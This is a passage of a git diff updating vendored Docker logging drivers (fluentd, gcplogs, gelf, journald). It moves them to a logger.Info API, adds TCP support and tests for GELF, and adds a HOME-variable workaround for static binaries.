-		if asyncConnect, err = strconv.ParseBool(ctx.Config[asyncConnectKey]); err != nil {
+	if info.Config[asyncConnectKey] != "" {
+		if asyncConnect, err = strconv.ParseBool(info.Config[asyncConnectKey]); err != nil {
+			return nil, err
+		}
+	}
+
+	subSecondPrecision := false
+	if info.Config[subSecondPrecisionKey] != "" {
+		if subSecondPrecision, err = strconv.ParseBool(info.Config[subSecondPrecisionKey]); err != nil {
 			return nil, err
 		}
 	}
 
 	fluentConfig := fluent.Config{
-		FluentPort:       loc.port,
-		FluentHost:       loc.host,
-		FluentNetwork:    loc.protocol,
-		FluentSocketPath: loc.path,
-		BufferLimit:      bufferLimit,
-		RetryWait:        retryWait,
-		MaxRetry:         maxRetries,
-		AsyncConnect:     asyncConnect,
+		FluentPort:         loc.port,
+		FluentHost:         loc.host,
+		FluentNetwork:      loc.protocol,
+		FluentSocketPath:   loc.path,
+		BufferLimit:        bufferLimit,
+		RetryWait:          retryWait,
+		MaxRetry:           maxRetries,
+		AsyncConnect:       asyncConnect,
+		SubSecondPrecision: subSecondPrecision,
 	}
 
-	logrus.WithField("container", ctx.ContainerID).WithField("config", fluentConfig).
+	logrus.WithField("container", info.ContainerID).WithField("config", fluentConfig).
 		Debug("logging driver fluentd configured")
 
 	log, err := fluent.New(fluentConfig)
@@ -134,8 +146,8 @@ func New(ctx logger.Context) (logger.Logger, error) {
 	}
 	return &fluentd{
 		tag:           tag,
-		containerID:   ctx.ContainerID,
-		containerName: ctx.ContainerName,
+		containerID:   info.ContainerID,
+		containerName: info.ContainerName,
 		writer:        log,
 		extra:         extra,
 	}, nil
@@ -151,9 +163,15 @@ func (f *fluentd) Log(msg *logger.Message) error {
 	for k, v := range f.extra {
 		data[k] = v
 	}
+	if msg.PLogMetaData != nil {
+		data["partial_message"] = "true"
+	}
+
+	ts := msg.Timestamp
+	logger.PutMessage(msg)
 	// fluent-logger-golang buffers logs from failures and disconnections,
 	// and these are transferred again automatically.
-	return f.writer.PostWithTime(f.tag, msg.Timestamp, data)
+	return f.writer.PostWithTime(f.tag, ts, data)
 }
 
 func (f *fluentd) Close() error {
@@ -169,6 +187,7 @@ func ValidateLogOpt(cfg map[string]string) error {
 	for key := range cfg {
 		switch key {
 		case "env":
+		case "env-regex":
 		case "labels":
 		case "tag":
 		case addressKey:
@@ -176,17 +195,15 @@ func ValidateLogOpt(cfg map[string]string) error {
 		case retryWaitKey:
 		case maxRetriesKey:
 		case asyncConnectKey:
+		case subSecondPrecisionKey:
 			// Accepted
 		default:
 			return fmt.Errorf("unknown log opt '%s' for fluentd log driver", key)
 		}
 	}
 
-	if _, err := parseAddress(cfg["fluentd-address"]); err != nil {
-		return err
-	}
-
-	return nil
+	_, err := parseAddress(cfg[addressKey])
+	return err
 }
 
 func parseAddress(address string) (*location, error) {
diff --git a/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go
index 9a8c1c903f..1699f67a2d 100644
--- a/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go
+++ b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go
@@ -1,6 +1,7 @@
-package gcplogs
+package gcplogs // import "github.com/docker/docker/daemon/logger/gcplogs"
 
 import (
+	"context"
 	"fmt"
 	"sync"
 	"sync/atomic"
@@ -8,22 +9,23 @@ import (
 
 	"github.com/docker/docker/daemon/logger"
 
-	"github.com/Sirupsen/logrus"
-	"golang.org/x/net/context"
-	"google.golang.org/cloud/compute/metadata"
-	"google.golang.org/cloud/logging"
+	"cloud.google.com/go/compute/metadata"
+	"cloud.google.com/go/logging"
+	"github.com/sirupsen/logrus"
+	mrpb "google.golang.org/genproto/googleapis/api/monitoredres"
 )
 
 const (
 	name = "gcplogs"
 
-	projectOptKey = "gcp-project"
-	logLabelsKey  = "labels"
-	logEnvKey     = "env"
-	logCmdKey     = "gcp-log-cmd"
-	logZoneKey    = "gcp-meta-zone"
-	logNameKey    = "gcp-meta-name"
-	logIDKey      = "gcp-meta-id"
+	projectOptKey  = "gcp-project"
+	logLabelsKey   = "labels"
+	logEnvKey      = "env"
+	logEnvRegexKey = "env-regex"
+	logCmdKey      = "gcp-log-cmd"
+	logZoneKey     = "gcp-meta-zone"
+	logNameKey     = "gcp-meta-name"
+	logIDKey       = "gcp-meta-id"
 )
 
 var (
@@ -51,7 +53,7 @@ func init() {
 }
 
 type gcplogs struct {
-	client    *logging.Client
+	logger    *logging.Logger
 	instance  *instanceInfo
 	container *containerInfo
 }
@@ -59,7 +61,7 @@ type gcplogs struct {
 type dockerLogEntry struct {
 	Instance  *instanceInfo  `json:"instance,omitempty"`
 	Container *containerInfo `json:"container,omitempty"`
-	Data      string         `json:"data,omitempty"`
+	Message   string         `json:"message,omitempty"`
 }
 
 type instanceInfo struct {
@@ -87,7 +89,7 @@ func initGCP() {
 			// These will fail on instances if the metadata service is
 			// down or the client is compiled with an API version that
 			// has been removed. Since these are not vital, let's ignore
-			// them and make their fields in the dockeLogEntry ,omitempty
+			// them and make their fields in the dockerLogEntry ,omitempty
 			projectID, _ = metadata.ProjectID()
 			zone, _ = metadata.Zone()
 			instanceName, _ = metadata.InstanceName()
@@ -100,68 +102,104 @@ func initGCP() {
 // default credentials.
 //
 // See https://developers.google.com/identity/protocols/application-default-credentials
-func New(ctx logger.Context) (logger.Logger, error) {
+func New(info logger.Info) (logger.Logger, error) {
 	initGCP()
 
 	var project string
 	if projectID != "" {
 		project = projectID
 	}
-	if projectID, found := ctx.Config[projectOptKey]; found {
+	if projectID, found := info.Config[projectOptKey]; found {
 		project = projectID
 	}
 	if project == "" {
-		return nil, fmt.Errorf("No project was specified and couldn't read project from the meatadata server. Please specify a project")
+		return nil, fmt.Errorf("No project was specified and couldn't read project from the metadata server. Please specify a project")
 	}
 
-	c, err := logging.NewClient(context.Background(), project, "gcplogs-docker-driver")
+	// Issue #29344: gcplogs segfaults (static binary)
+	// If HOME is not set, logging.NewClient() will call os/user.Current() via oauth2/google.
+	// However, in static binary, os/user.Current() leads to segfault due to a glibc issue that won't be fixed
+	// in a short term. (golang/go#13470, https://sourceware.org/bugzilla/show_bug.cgi?id=19341)
+	// So we forcibly set HOME so as to avoid call to os/user/Current()
+	if err := ensureHomeIfIAmStatic(); err != nil {
+		return nil, err
+	}
+
+	c, err := logging.NewClient(context.Background(), project)
 	if err != nil {
 		return nil, err
 	}
+	var instanceResource *instanceInfo
+	if onGCE {
+		instanceResource = &instanceInfo{
+			Zone: zone,
+			Name: instanceName,
+			ID:   instanceID,
+		}
+	} else if info.Config[logZoneKey] != "" || info.Config[logNameKey] != "" || info.Config[logIDKey] != "" {
+		instanceResource = &instanceInfo{
+			Zone: info.Config[logZoneKey],
+			Name: info.Config[logNameKey],
+			ID:   info.Config[logIDKey],
+		}
+	}
 
-	if err := c.Ping(); err != nil {
+	options := []logging.LoggerOption{}
+	if instanceResource != nil {
+		vmMrpb := logging.CommonResource(
+			&mrpb.MonitoredResource{
+				Type: "gce_instance",
+				Labels: map[string]string{
+					"instance_id": instanceResource.ID,
+					"zone":        instanceResource.Zone,
+				},
+			},
+		)
+		options = []logging.LoggerOption{vmMrpb}
+	}
+	lg := c.Logger("gcplogs-docker-driver", options...)
+
+	if err := c.Ping(context.Background()); err != nil {
 		return nil, fmt.Errorf("unable to connect or authenticate with Google Cloud Logging: %v", err)
 	}
 
+	extraAttributes, err := info.ExtraAttributes(nil)
+	if err != nil {
+		return nil, err
+	}
+
 	l := &gcplogs{
-		client: c,
+		logger: lg,
 		container: &containerInfo{
-			Name:      ctx.ContainerName,
-			ID:        ctx.ContainerID,
-			ImageName: ctx.ContainerImageName,
-			ImageID:   ctx.ContainerImageID,
-			Created:   ctx.ContainerCreated,
-			Metadata:  ctx.ExtraAttributes(nil),
+			Name:      info.ContainerName,
+			ID:        info.ContainerID,
+			ImageName: info.ContainerImageName,
+			ImageID:   info.ContainerImageID,
+			Created:   info.ContainerCreated,
+			Metadata:  extraAttributes,
 		},
 	}
 
-	if ctx.Config[logCmdKey] == "true" {
-		l.container.Command = ctx.Command()
+	if info.Config[logCmdKey] == "true" {
+		l.container.Command = info.Command()
 	}
 
-	if onGCE {
-		l.instance = &instanceInfo{
-			Zone: zone,
-			Name: instanceName,
-			ID:   instanceID,
-		}
-	} else if ctx.Config[logZoneKey] != "" || ctx.Config[logNameKey] != "" || ctx.Config[logIDKey] != "" {
-		l.instance = &instanceInfo{
-			Zone: ctx.Config[logZoneKey],
-			Name: ctx.Config[logNameKey],
-			ID:   ctx.Config[logIDKey],
-		}
+	if instanceResource != nil {
+		l.instance = instanceResource
 	}
 
 	// The logger "overflows" at a rate of 10,000 logs per second and this
 	// overflow func is called. We want to surface the error to the user
 	// without overly spamming /var/log/docker.log so we log the first time
 	// we overflow and every 1000th time after.
-	c.Overflow = func(_ *logging.Client, _ logging.Entry) error {
-		if i := atomic.AddUint64(&droppedLogs, 1); i%1000 == 1 {
-			logrus.Errorf("gcplogs driver has dropped %v logs", i)
+	c.OnError = func(err error) {
+		if err == logging.ErrOverflow {
+			if i := atomic.AddUint64(&droppedLogs, 1); i%1000 == 1 {
+				logrus.Errorf("gcplogs driver has dropped %v logs", i)
+			}
+		} else {
+			logrus.Error(err)
 		}
-		return nil
 	}
 
 	return l, nil
@@ -172,7 +210,7 @@ func New(ctx logger.Context) (logger.Logger, error) {
 func ValidateLogOpts(cfg map[string]string) error {
 	for k := range cfg {
 		switch k {
-		case projectOptKey, logLabelsKey, logEnvKey, logCmdKey, logZoneKey, logNameKey, logIDKey:
+		case projectOptKey, logLabelsKey, logEnvKey, logEnvRegexKey, logCmdKey, logZoneKey, logNameKey, logIDKey:
 		default:
 			return fmt.Errorf("%q is not a valid option for the gcplogs driver", k)
 		}
@@ -181,18 +219,24 @@ func ValidateLogOpts(cfg map[string]string) error {
 }
 
 func (l *gcplogs) Log(m *logger.Message) error {
-	return l.client.Log(logging.Entry{
-		Time: m.Timestamp,
+	message := string(m.Line)
+	ts := m.Timestamp
+	logger.PutMessage(m)
+
+	l.logger.Log(logging.Entry{
+		Timestamp: ts,
 		Payload: &dockerLogEntry{
 			Instance:  l.instance,
 			Container: l.container,
-			Data:      string(m.Line),
+			Message:   message,
 		},
 	})
+	return nil
 }
 
 func (l *gcplogs) Close() error {
-	return l.client.Flush()
+	l.logger.Flush()
+	return nil
 }
 
 func (l *gcplogs) Name() string {
diff --git a/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_linux.go b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_linux.go
new file mode 100644
index 0000000000..27f8ef32f5
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_linux.go
@@ -0,0 +1,29 @@
+package gcplogs // import "github.com/docker/docker/daemon/logger/gcplogs"
+
+import (
+	"os"
+
+	"github.com/docker/docker/dockerversion"
+	"github.com/docker/docker/pkg/homedir"
+	"github.com/sirupsen/logrus"
+)
+
+// ensureHomeIfIAmStatic ensure $HOME to be set if dockerversion.IAmStatic is "true".
+// See issue #29344: gcplogs segfaults (static binary)
+// If HOME is not set, logging.NewClient() will call os/user.Current() via oauth2/google.
+// However, in static binary, os/user.Current() leads to segfault due to a glibc issue that won't be fixed
+// in a short term. (golang/go#13470, https://sourceware.org/bugzilla/show_bug.cgi?id=19341)
+// So we forcibly set HOME so as to avoid call to os/user/Current()
+func ensureHomeIfIAmStatic() error {
+	// Note: dockerversion.IAmStatic and homedir.GetStatic() is only available for linux.
+	// So we need to use them in this gcplogging_linux.go rather than in gcplogging.go
+	if dockerversion.IAmStatic == "true" && os.Getenv("HOME") == "" {
+		home, err := homedir.GetStatic()
+		if err != nil {
+			return err
+		}
+		logrus.Warnf("gcplogs requires HOME to be set for static daemon binary. Forcibly setting HOME to %s.", home)
+		os.Setenv("HOME", home)
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_others.go b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_others.go
new file mode 100644
index 0000000000..10a2cdc8cd
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_others.go
@@ -0,0 +1,7 @@
+// +build !linux
+
+package gcplogs // import "github.com/docker/docker/daemon/logger/gcplogs"
+
+func ensureHomeIfIAmStatic() error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go
index 95860ac083..e9c860406a 100644
--- a/vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go
+++ b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go
@@ -1,11 +1,8 @@
-// +build linux
-
 // Package gelf provides the log driver for forwarding server logs to
 // endpoints that support the Graylog Extended Log Format.
-package gelf
+package gelf // import "github.com/docker/docker/daemon/logger/gelf"
 
 import (
-	"bytes"
 	"compress/flate"
 	"encoding/json"
 	"fmt"
@@ -15,17 +12,17 @@ import (
 	"time"
 
 	"github.com/Graylog2/go-gelf/gelf"
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/daemon/logger"
 	"github.com/docker/docker/daemon/logger/loggerutils"
 	"github.com/docker/docker/pkg/urlutil"
+	"github.com/sirupsen/logrus"
 )
 
 const name = "gelf"
 
 type gelfLogger struct {
-	writer   *gelf.Writer
-	ctx      logger.Context
+	writer   gelf.Writer
+	info     logger.Info
 	hostname string
 	rawExtra json.RawMessage
 }
@@ -41,44 +38,46 @@ func init() {
 
 // New creates a gelf logger using the configuration passed in on the
 // context. The supported context configuration variable is gelf-address.
-func New(ctx logger.Context) (logger.Logger, error) {
+func New(info logger.Info) (logger.Logger, error) {
 	// parse gelf address
-	address, err := parseAddress(ctx.Config["gelf-address"])
+	address, err := parseAddress(info.Config["gelf-address"])
 	if err != nil {
 		return nil, err
 	}
 
 	// collect extra data for GELF message
-	hostname, err := ctx.Hostname()
+	hostname, err := info.Hostname()
 	if err != nil {
 		return nil, fmt.Errorf("gelf: cannot access hostname to set source field")
 	}
 
-	// remove trailing slash from container name
-	containerName := bytes.TrimLeft([]byte(ctx.ContainerName), "/")
-
 	// parse log tag
-	tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate)
+	tag, err := loggerutils.ParseLogTag(info, loggerutils.DefaultTemplate)
 	if err != nil {
 		return nil, err
 	}
 
 	extra := map[string]interface{}{
-		"_container_id":   ctx.ContainerID,
-		"_container_name": string(containerName),
-		"_image_id":       ctx.ContainerImageID,
-		"_image_name":     ctx.ContainerImageName,
-		"_command":        ctx.Command(),
+		"_container_id":   info.ContainerID,
+		"_container_name": info.Name(),
+		"_image_id":       info.ContainerImageID,
+		"_image_name":     info.ContainerImageName,
+		"_command":        info.Command(),
 		"_tag":            tag,
-		"_created":        ctx.ContainerCreated,
+		"_created":        info.ContainerCreated,
 	}
 
-	extraAttrs := ctx.ExtraAttributes(func(key string) string {
+	extraAttrs, err := info.ExtraAttributes(func(key string) string {
 		if key[0] == '_' {
 			return key
 		}
 		return "_" + key
 	})
+
+	if err != nil {
+		return nil, err
+	}
+
 	for k, v := range extraAttrs {
 		extra[k] = v
 	}
@@ -88,13 +87,61 @@ func New(ctx logger.Context) (logger.Logger, error) {
 		return nil, err
 	}
 
-	// create new gelfWriter
-	gelfWriter, err := gelf.NewWriter(address)
+	var gelfWriter gelf.Writer
+	if address.Scheme == "udp" {
+		gelfWriter, err = newGELFUDPWriter(address.Host, info)
+		if err != nil {
+			return nil, err
+		}
+	} else if address.Scheme == "tcp" {
+		gelfWriter, err = newGELFTCPWriter(address.Host, info)
+		if err != nil {
+			return nil, err
+		}
+	}
+
+	return &gelfLogger{
+		writer:   gelfWriter,
+		info:     info,
+		hostname: hostname,
+		rawExtra: rawExtra,
+	}, nil
+}
+
+// create new TCP gelfWriter
+func newGELFTCPWriter(address string, info logger.Info) (gelf.Writer, error) {
+	gelfWriter, err := gelf.NewTCPWriter(address)
+	if err != nil {
+		return nil, fmt.Errorf("gelf: cannot connect to GELF endpoint: %s %v", address, err)
+	}
+
+	if v, ok := info.Config["gelf-tcp-max-reconnect"]; ok {
+		i, err := strconv.Atoi(v)
+		if err != nil || i < 0 {
+			return nil, fmt.Errorf("gelf-tcp-max-reconnect must be a positive integer")
+		}
+		gelfWriter.MaxReconnect = i
+	}
+
+	if v, ok := info.Config["gelf-tcp-reconnect-delay"]; ok {
+		i, err := strconv.Atoi(v)
+		if err != nil || i < 0 {
+			return nil, fmt.Errorf("gelf-tcp-reconnect-delay must be a positive integer")
+		}
+		gelfWriter.ReconnectDelay = time.Duration(i)
+	}
+
+	return gelfWriter, nil
+}
+
+// create new UDP gelfWriter
+func newGELFUDPWriter(address string, info logger.Info) (gelf.Writer, error) {
+	gelfWriter, err := gelf.NewUDPWriter(address)
 	if err != nil {
 		return nil, fmt.Errorf("gelf: cannot connect to GELF endpoint: %s %v", address, err)
 	}
 
-	if v, ok := ctx.Config["gelf-compression-type"]; ok {
+	if v, ok := info.Config["gelf-compression-type"]; ok {
 		switch v {
 		case "gzip":
 			gelfWriter.CompressionType = gelf.CompressGzip
@@ -107,7 +154,7 @@ func New(ctx logger.Context) (logger.Logger, error) {
 		}
 	}
 
-	if v, ok := ctx.Config["gelf-compression-level"]; ok {
+	if v, ok := info.Config["gelf-compression-level"]; ok {
 		val, err := strconv.Atoi(v)
 		if err != nil {
 			return nil, fmt.Errorf("gelf: invalid compression level %s, err %v", v, err)
@@ -115,12 +162,7 @@ func New(ctx logger.Context) (logger.Logger, error) {
 		gelfWriter.CompressionLevel = val
 	}
 
-	return &gelfLogger{
-		writer:   gelfWriter,
-		ctx:      ctx,
-		hostname: hostname,
-		rawExtra: rawExtra,
-	}, nil
+	return gelfWriter, nil
 }
 
 func (s *gelfLogger) Log(msg *logger.Message) error {
@@ -134,9 +176,10 @@ func (s *gelfLogger) Log(msg *logger.Message) error {
 		Host:     s.hostname,
 		Short:    string(msg.Line),
 		TimeUnix: float64(msg.Timestamp.UnixNano()/int64(time.Millisecond)) / 1000.0,
-		Level:    level,
+		Level:    int32(level),
 		RawExtra: s.rawExtra,
 	}
+	logger.PutMessage(msg)
 
 	if err := s.writer.WriteMessage(&m); err != nil {
 		return fmt.Errorf("gelf: cannot send GELF message: %v", err)
@@ -154,56 +197,72 @@ func (s *gelfLogger) Name() string {
 
 // ValidateLogOpt looks for gelf specific log option gelf-address.
 func ValidateLogOpt(cfg map[string]string) error {
+	address, err := parseAddress(cfg["gelf-address"])
+	if err != nil {
+		return err
+	}
+
 	for key, val := range cfg {
 		switch key {
 		case "gelf-address":
 		case "tag":
 		case "labels":
 		case "env":
+		case "env-regex":
 		case "gelf-compression-level":
+			if address.Scheme != "udp" {
+				return fmt.Errorf("compression is only supported on UDP")
+			}
 			i, err := strconv.Atoi(val)
 			if err != nil || i < flate.DefaultCompression || i > flate.BestCompression {
 				return fmt.Errorf("unknown value %q for log opt %q for gelf log driver", val, key)
 			}
 		case "gelf-compression-type":
+			if address.Scheme != "udp" {
+				return fmt.Errorf("compression is only supported on UDP")
+			}
 			switch val {
 			case "gzip", "zlib", "none":
 			default:
 				return fmt.Errorf("unknown value %q for log opt %q for gelf log driver", val, key)
 			}
+		case "gelf-tcp-max-reconnect", "gelf-tcp-reconnect-delay":
+			if address.Scheme != "tcp" {
+				return fmt.Errorf("%q is only valid for TCP", key)
+			}
+			i, err := strconv.Atoi(val)
+			if err != nil || i < 0 {
+				return fmt.Errorf("%q must be a positive integer", key)
+			}
 		default:
 			return fmt.Errorf("unknown log opt %q for gelf log driver", key)
 		}
 	}
 
-	if _, err := parseAddress(cfg["gelf-address"]); err != nil {
-		return err
-	}
-
 	return nil
 }
 
-func parseAddress(address string) (string, error) {
+func parseAddress(address string) (*url.URL, error) {
 	if address == "" {
-		return "", nil
+		return nil, fmt.Errorf("gelf-address is a required parameter")
 	}
 	if !urlutil.IsTransportURL(address) {
-		return "", fmt.Errorf("gelf-address should be in form proto://address, got %v", address)
+		return nil, fmt.Errorf("gelf-address should be in form proto://address, got %v", address)
 	}
 	url, err := url.Parse(address)
 	if err != nil {
-		return "", err
+		return nil, err
 	}
 
 	// we support only udp
-	if url.Scheme != "udp" {
-		return "", fmt.Errorf("gelf: endpoint needs to be UDP")
+	if url.Scheme != "udp" && url.Scheme != "tcp" {
+		return nil, fmt.Errorf("gelf: endpoint needs to be TCP or UDP")
 	}
 
 	// get host and port
 	if _, _, err = net.SplitHostPort(url.Host); err != nil {
-		return "", fmt.Errorf("gelf: please provide gelf-address as udp://host:port")
+		return nil, fmt.Errorf("gelf: please provide gelf-address as proto://host:port")
 	}
 
-	return url.Host, nil
+	return url, nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_test.go b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_test.go
new file mode 100644
index 0000000000..a88d56ce16
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_test.go
@@ -0,0 +1,260 @@
+// +build linux
+
+package gelf // import "github.com/docker/docker/daemon/logger/gelf"
+
+import (
+	"net"
+	"testing"
+
+	"github.com/docker/docker/daemon/logger"
+)
+
+// Validate parseAddress
+func TestParseAddress(t *testing.T) {
+	url, err := parseAddress("udp://127.0.0.1:12201")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if url.String() != "udp://127.0.0.1:12201" {
+		t.Fatalf("Expected address udp://127.0.0.1:12201, got %s", url.String())
+	}
+
+	_, err = parseAddress("127.0.0.1:12201")
+	if err == nil {
+		t.Fatal("Expected error requiring protocol")
+	}
+
+	_, err = parseAddress("http://127.0.0.1:12201")
+	if err == nil {
+		t.Fatal("Expected error restricting protocol")
+	}
+}
+
+// Validate TCP options
+func TestTCPValidateLogOpt(t *testing.T) {
+	err := ValidateLogOpt(map[string]string{
+		"gelf-address": "tcp://127.0.0.1:12201",
+	})
+	if err != nil {
+		t.Fatal("Expected TCP to be supported")
+	}
+
+	err = ValidateLogOpt(map[string]string{
+		"gelf-address":           "tcp://127.0.0.1:12201",
+		"gelf-compression-level": "9",
+	})
+	if err == nil {
+		t.Fatal("Expected TCP to reject compression level")
+	}
+
+	err = ValidateLogOpt(map[string]string{
+		"gelf-address":          "tcp://127.0.0.1:12201",
+		"gelf-compression-type": "gzip",
+	})
+	if err == nil {
+		t.Fatal("Expected TCP to reject compression type")
+	}
+
+	err = ValidateLogOpt(map[string]string{
+		"gelf-address":             "tcp://127.0.0.1:12201",
+		"gelf-tcp-max-reconnect":   "5",
+		"gelf-tcp-reconnect-delay": "10",
+	})
+	if err != nil {
+		t.Fatal("Expected TCP reconnect to be a valid parameters")
+	}
+
+	err = ValidateLogOpt(map[string]string{
+		"gelf-address":             "tcp://127.0.0.1:12201",
+		"gelf-tcp-max-reconnect":   "-1",
+		"gelf-tcp-reconnect-delay": "-3",
+	})
+	if err == nil {
+		t.Fatal("Expected negative TCP reconnect to be rejected")
+	}
+
+	err = ValidateLogOpt(map[string]string{
+		"gelf-address":             "tcp://127.0.0.1:12201",
+		"gelf-tcp-max-reconnect":   "invalid",
+		"gelf-tcp-reconnect-delay": "invalid",
+	})
+	if err == nil {
+		t.Fatal("Expected TCP reconnect to be required to be an int")
+	}
+
+	err = ValidateLogOpt(map[string]string{
+		"gelf-address":             "udp://127.0.0.1:12201",
+		"gelf-tcp-max-reconnect":   "1",
+		"gelf-tcp-reconnect-delay": "3",
+	})
+	if err == nil {
+		t.Fatal("Expected TCP reconnect to be invalid for UDP")
+	}
+}
+
+// Validate UDP options
+func TestUDPValidateLogOpt(t *testing.T) {
+	err := ValidateLogOpt(map[string]string{
+		"gelf-address":           "udp://127.0.0.1:12201",
+		"tag":                    "testtag",
+		"labels":                 "testlabel",
+		"env":                    "testenv",
+		"env-regex":              "testenv-regex",
+		"gelf-compression-level": "9",
+		"gelf-compression-type":  "gzip",
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	err = ValidateLogOpt(map[string]string{
+		"gelf-address":           "udp://127.0.0.1:12201",
+		"gelf-compression-level": "ultra",
+		"gelf-compression-type":  "zlib",
+	})
+	if err == nil {
+		t.Fatal("Expected compression level error")
+	}
+
+	err = ValidateLogOpt(map[string]string{
+		"gelf-address":          "udp://127.0.0.1:12201",
+		"gelf-compression-type": "rar",
+	})
+	if err == nil {
+		t.Fatal("Expected compression type error")
+	}
+
+	err = ValidateLogOpt(map[string]string{
+		"invalid": "invalid",
+	})
+	if err == nil {
+		t.Fatal("Expected unknown option error")
+	}
+
+	err = ValidateLogOpt(map[string]string{})
+	if err == nil {
+		t.Fatal("Expected required parameter error")
+	}
+}
+
+// Validate newGELFTCPWriter
+func TestNewGELFTCPWriter(t *testing.T) {
+	address := "127.0.0.1:0"
+	tcpAddr, err := net.ResolveTCPAddr("tcp", address)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	listener, err := net.ListenTCP("tcp", tcpAddr)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	url := "tcp://" + listener.Addr().String()
+	info := logger.Info{
+		Config: map[string]string{
+			"gelf-address":             url,
+			"gelf-tcp-max-reconnect":   "0",
+			"gelf-tcp-reconnect-delay": "0",
+			"tag": "{{.ID}}",
+		},
+		ContainerID: "12345678901234567890",
+	}
+
+	writer, err := newGELFTCPWriter(listener.Addr().String(), info)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	err = writer.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	err = listener.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+// Validate newGELFUDPWriter
+func TestNewGELFUDPWriter(t *testing.T) {
+	address := "127.0.0.1:0"
+	info := logger.Info{
+		Config: map[string]string{
+			"gelf-address":           "udp://127.0.0.1:0",
+			"gelf-compression-level": "5",
+			"gelf-compression-type":  "gzip",
+		},
+	}
+
+	writer, err := newGELFUDPWriter(address, info)
+	if err != nil {
+		t.Fatal(err)
+	}
+	writer.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+// Validate New for TCP
+func TestNewTCP(t *testing.T) {
+	address := "127.0.0.1:0"
+	tcpAddr, err := net.ResolveTCPAddr("tcp", address)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	listener, err := net.ListenTCP("tcp", tcpAddr)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	url := "tcp://" + listener.Addr().String()
+	info := logger.Info{
+		Config: map[string]string{
+			"gelf-address":             url,
+			"gelf-tcp-max-reconnect":   "0",
+			"gelf-tcp-reconnect-delay": "0",
+		},
+		ContainerID: "12345678901234567890",
+	}
+
+	logger, err := New(info)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	err = logger.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	err = listener.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+// Validate New for UDP
+func TestNewUDP(t *testing.T) {
+	info := logger.Info{
+		Config: map[string]string{
+			"gelf-address":           "udp://127.0.0.1:0",
+			"gelf-compression-level": "5",
+			"gelf-compression-type":  "gzip",
+		},
+		ContainerID: "12345678901234567890",
+	}
+
+	logger, err := New(info)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	err = logger.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go
deleted file mode 100644
index 266f73b18b..0000000000
--- a/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go
+++ /dev/null
@@ -1,3 +0,0 @@
-// +build !linux
-
-package gelf
diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/journald.go b/vendor/github.com/docker/docker/daemon/logger/journald/journald.go
index 9569859121..342e18f57f 100644
--- a/vendor/github.com/docker/docker/daemon/logger/journald/journald.go
+++ b/vendor/github.com/docker/docker/daemon/logger/journald/journald.go
@@ -2,28 +2,29 @@
 
 // Package journald provides the log driver for forwarding server logs
 // to endpoints that receive the systemd format.
-package journald
+package journald // import "github.com/docker/docker/daemon/logger/journald"
 
 import (
 	"fmt"
 	"sync"
 	"unicode"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/coreos/go-systemd/journal"
 	"github.com/docker/docker/daemon/logger"
 	"github.com/docker/docker/daemon/logger/loggerutils"
+	"github.com/sirupsen/logrus"
 )
 
 const name = "journald"
 
 type journald struct {
+	mu      sync.Mutex
 	vars    map[string]string // additional variables and values to send to the journal along with the log message
 	readers readerList
+	closed  bool
 }
 
 type readerList struct {
-	mu      sync.Mutex
 	readers map[*logger.LogWatcher]*logger.LogWatcher
 }
 
@@ -58,30 +59,28 @@ func sanitizeKeyMod(s string) string {
 
 // New creates a journald logger using the configuration passed in on
 // the context.
-func New(ctx logger.Context) (logger.Logger, error) {
+func New(info logger.Info) (logger.Logger, error) {
 	if !journal.Enabled() {
 		return nil, fmt.Errorf("journald is not enabled on this host")
 	}
-	// Strip a leading slash so that people can search for
-	// CONTAINER_NAME=foo rather than CONTAINER_NAME=/foo.
-	name := ctx.ContainerName
-	if name[0] == '/' {
-		name = name[1:]
-	}
 
 	// parse log tag
-	tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate)
+	tag, err := loggerutils.ParseLogTag(info, loggerutils.DefaultTemplate)
 	if err != nil {
 		return nil, err
 	}
 
 	vars := map[string]string{
-		"CONTAINER_ID":      ctx.ContainerID[:12],
-		"CONTAINER_ID_FULL": ctx.ContainerID,
-		"CONTAINER_NAME":    name,
+		"CONTAINER_ID":      info.ContainerID[:12],
+		"CONTAINER_ID_FULL": info.ContainerID,
